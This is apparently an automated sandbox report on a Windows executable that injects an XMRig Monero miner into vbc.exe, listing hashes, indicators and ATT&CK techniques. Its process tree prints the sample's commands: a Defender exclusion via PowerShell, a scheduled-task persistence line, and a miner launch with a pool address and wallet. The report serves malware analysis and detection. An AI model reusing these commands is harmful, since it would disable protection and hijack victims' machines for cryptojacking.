xmrig | cc555e7c4b89de37ab73856b20305f0f81f3cd02ea0d43925bab4f7eb288dd94

Analysis

max time kernel
118s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20221111-en
resource tags

arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
submitted
08-02-2023 10:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a600ce7f58bc3296788ca8a8b30735c7bf051e4e9a3d46584fe83bb7cfc5d81a.exe
Size

1.9MB
MD5

45085c318bfa7583aa52768592b08b80
SHA1

3a1bf58f44d58054e04bd33774fb02a8a6827371
SHA256

a600ce7f58bc3296788ca8a8b30735c7bf051e4e9a3d46584fe83bb7cfc5d81a
SHA512

d1c1ad296a9f46f32c1e4950aeaa0eda47a02098670600ab2345f943ef8e275741baf9b9f75e4efbc2d31bed92ef454bca25c8423e06701ff00c7060b66681bd
SSDEEP

24576:yxY/n90/8CB6Ya4cPP4bPS1h4rQm/wt0QSnfepXQUgy5vmelCS/69+cW:yxsn946YaT3mPGh4twyrfe9QpelCQy

Score

10^/10

xmrig miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 6 IoCs

miner

resource	yara_rule
behavioral2/memory/1488-157-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/1488-158-0x0000000140343234-mapping.dmp	xmrig
behavioral2/memory/1488-159-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/1488-160-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/1488-162-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral2/memory/1488-166-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig

.NET Reactor proctector 2 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

resource	yara_rule
behavioral2/memory/4796-140-0x0000000000090000-0x0000000000272000-memory.dmp	net_reactor
behavioral2/memory/4796-164-0x0000000000090000-0x0000000000272000-memory.dmp	net_reactor

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation	a600ce7f58bc3296788ca8a8b30735c7bf051e4e9a3d46584fe83bb7cfc5d81a.exe

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4796 set thread context of 1488	4796	a600ce7f58bc3296788ca8a8b30735c7bf051e4e9a3d46584fe83bb7cfc5d81a.exe	88

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
4604	schtasks.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
4796	a600ce7f58bc3296788ca8a8b30735c7bf051e4e9a3d46584fe83bb7cfc5d81a.exe
4796	a600ce7f58bc3296788ca8a8b30735c7bf051e4e9a3d46584fe83bb7cfc5d81a.exe
4416	powershell.exe
4416	powershell.exe
4796	a600ce7f58bc3296788ca8a8b30735c7bf051e4e9a3d46584fe83bb7cfc5d81a.exe
4796	a600ce7f58bc3296788ca8a8b30735c7bf051e4e9a3d46584fe83bb7cfc5d81a.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
652	Process not Found

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	4796	a600ce7f58bc3296788ca8a8b30735c7bf051e4e9a3d46584fe83bb7cfc5d81a.exe
Token: SeDebugPrivilege	4416	powershell.exe
Token: SeLockMemoryPrivilege	1488	vbc.exe
Token: SeLockMemoryPrivilege	1488	vbc.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
1488	vbc.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 4796 wrote to memory of 4416	4796	a600ce7f58bc3296788ca8a8b30735c7bf051e4e9a3d46584fe83bb7cfc5d81a.exe	82
PID 4796 wrote to memory of 4416	4796	a600ce7f58bc3296788ca8a8b30735c7bf051e4e9a3d46584fe83bb7cfc5d81a.exe	82
PID 4796 wrote to memory of 2440	4796	a600ce7f58bc3296788ca8a8b30735c7bf051e4e9a3d46584fe83bb7cfc5d81a.exe	84
PID 4796 wrote to memory of 2440	4796	a600ce7f58bc3296788ca8a8b30735c7bf051e4e9a3d46584fe83bb7cfc5d81a.exe	84
PID 2440 wrote to memory of 4604	2440	cmd.exe	86
PID 2440 wrote to memory of 4604	2440	cmd.exe	86
PID 4796 wrote to memory of 1488	4796	a600ce7f58bc3296788ca8a8b30735c7bf051e4e9a3d46584fe83bb7cfc5d81a.exe	88
PID 4796 wrote to memory of 1488	4796	a600ce7f58bc3296788ca8a8b30735c7bf051e4e9a3d46584fe83bb7cfc5d81a.exe	88
PID 4796 wrote to memory of 1488	4796	a600ce7f58bc3296788ca8a8b30735c7bf051e4e9a3d46584fe83bb7cfc5d81a.exe	88
PID 4796 wrote to memory of 1488	4796	a600ce7f58bc3296788ca8a8b30735c7bf051e4e9a3d46584fe83bb7cfc5d81a.exe	88
PID 4796 wrote to memory of 1488	4796	a600ce7f58bc3296788ca8a8b30735c7bf051e4e9a3d46584fe83bb7cfc5d81a.exe	88
PID 4796 wrote to memory of 1488	4796	a600ce7f58bc3296788ca8a8b30735c7bf051e4e9a3d46584fe83bb7cfc5d81a.exe	88
PID 4796 wrote to memory of 1488	4796	a600ce7f58bc3296788ca8a8b30735c7bf051e4e9a3d46584fe83bb7cfc5d81a.exe	88
PID 4796 wrote to memory of 1488	4796	a600ce7f58bc3296788ca8a8b30735c7bf051e4e9a3d46584fe83bb7cfc5d81a.exe	88
PID 4796 wrote to memory of 1488	4796	a600ce7f58bc3296788ca8a8b30735c7bf051e4e9a3d46584fe83bb7cfc5d81a.exe	88
PID 4796 wrote to memory of 1488	4796	a600ce7f58bc3296788ca8a8b30735c7bf051e4e9a3d46584fe83bb7cfc5d81a.exe	88
PID 4796 wrote to memory of 1488	4796	a600ce7f58bc3296788ca8a8b30735c7bf051e4e9a3d46584fe83bb7cfc5d81a.exe	88
PID 4796 wrote to memory of 1488	4796	a600ce7f58bc3296788ca8a8b30735c7bf051e4e9a3d46584fe83bb7cfc5d81a.exe	88
PID 4796 wrote to memory of 1488	4796	a600ce7f58bc3296788ca8a8b30735c7bf051e4e9a3d46584fe83bb7cfc5d81a.exe	88
PID 4796 wrote to memory of 1488	4796	a600ce7f58bc3296788ca8a8b30735c7bf051e4e9a3d46584fe83bb7cfc5d81a.exe	88

C:\Users\Admin\AppData\Local\Temp\a600ce7f58bc3296788ca8a8b30735c7bf051e4e9a3d46584fe83bb7cfc5d81a.exe
"C:\Users\Admin\AppData\Local\Temp\a600ce7f58bc3296788ca8a8b30735c7bf051e4e9a3d46584fe83bb7cfc5d81a.exe"
1⤵
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4796
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4416
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "XORES" /tr "C:\ProgramData\Review\XORES.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2440
- - C:\Windows\system32\schtasks.exe
    schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "XORES" /tr "C:\ProgramData\Review\XORES.exe"
    3⤵
    - Creates scheduled task(s)
    PID:4604
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:1488

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Scripting

T1064

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Scripting

T1064

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1488-157-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1488-169-0x000001B715BE0000-0x000001B715C00000-memory.dmp

Filesize
128KB

Download
memory/1488-170-0x000001B715E10000-0x000001B715E30000-memory.dmp

Filesize
128KB

Download
memory/1488-168-0x000001B715E10000-0x000001B715E30000-memory.dmp

Filesize
128KB

Download
memory/1488-167-0x000001B715BE0000-0x000001B715C00000-memory.dmp

Filesize
128KB

Download
memory/1488-166-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1488-163-0x000001B683740000-0x000001B683780000-memory.dmp

Filesize
256KB

Download
memory/1488-162-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1488-161-0x000001B6835D0000-0x000001B6835F0000-memory.dmp

Filesize
128KB

Download
memory/1488-160-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1488-159-0x0000000140000000-0x00000001407C9000-memory.dmp

Filesize
7.8MB

Download
memory/1488-158-0x0000000140343234-mapping.dmp

Download
memory/2440-151-0x0000000000000000-mapping.dmp

Download
memory/4416-147-0x000001D393660000-0x000001D393682000-memory.dmp

Filesize
136KB

Download
memory/4416-148-0x00007FFBB5250000-0x00007FFBB5D11000-memory.dmp

Filesize
10.8MB

Download
memory/4416-146-0x0000000000000000-mapping.dmp

Download
memory/4604-152-0x0000000000000000-mapping.dmp

Download
memory/4796-144-0x00007FFBB5250000-0x00007FFBB5D11000-memory.dmp

Filesize
10.8MB

Download
memory/4796-141-0x00007FFBB3980000-0x00007FFBB3ACE000-memory.dmp

Filesize
1.3MB

Download
memory/4796-150-0x00007FFBB5250000-0x00007FFBB5D11000-memory.dmp

Filesize
10.8MB

Download
memory/4796-153-0x00007FFBBCB60000-0x00007FFBBCB95000-memory.dmp

Filesize
212KB

Download
memory/4796-154-0x00007FFBB09B0000-0x00007FFBB0AB2000-memory.dmp

Filesize
1.0MB

Download
memory/4796-155-0x00007FFBD2D80000-0x00007FFBD2DEB000-memory.dmp

Filesize
428KB

Download
memory/4796-156-0x00007FFBD0E80000-0x00007FFBD0EBB000-memory.dmp

Filesize
236KB

Download
memory/4796-145-0x00007FFBD1B10000-0x00007FFBD1B37000-memory.dmp

Filesize
156KB

Download
memory/4796-149-0x0000000000090000-0x0000000000272000-memory.dmp

Filesize
1.9MB

Download
memory/4796-142-0x0000000000090000-0x0000000000272000-memory.dmp

Filesize
1.9MB

Download
memory/4796-143-0x0000000000A70000-0x0000000000AB3000-memory.dmp

Filesize
268KB

Download
memory/4796-133-0x00007FFBB5D20000-0x00007FFBB5DCA000-memory.dmp

Filesize
680KB

Download
memory/4796-140-0x0000000000090000-0x0000000000272000-memory.dmp

Filesize
1.9MB

Download
memory/4796-139-0x00007FFBD40D0000-0x00007FFBD40FB000-memory.dmp

Filesize
172KB

Download
memory/4796-164-0x0000000000090000-0x0000000000272000-memory.dmp

Filesize
1.9MB

Download
memory/4796-165-0x00007FFBB5250000-0x00007FFBB5D11000-memory.dmp

Filesize
10.8MB

Download
memory/4796-138-0x00007FFBB5250000-0x00007FFBB5D11000-memory.dmp

Filesize
10.8MB

Download
memory/4796-137-0x00007FFBD2BD0000-0x00007FFBD2D71000-memory.dmp

Filesize
1.6MB

Download
memory/4796-136-0x00007FFBB5190000-0x00007FFBB524D000-memory.dmp

Filesize
756KB

Download
memory/4796-135-0x00007FFBCF9D0000-0x00007FFBCF9E2000-memory.dmp

Filesize
72KB

Download
memory/4796-134-0x00007FFBD2E50000-0x00007FFBD2EEE000-memory.dmp

Filesize
632KB

Download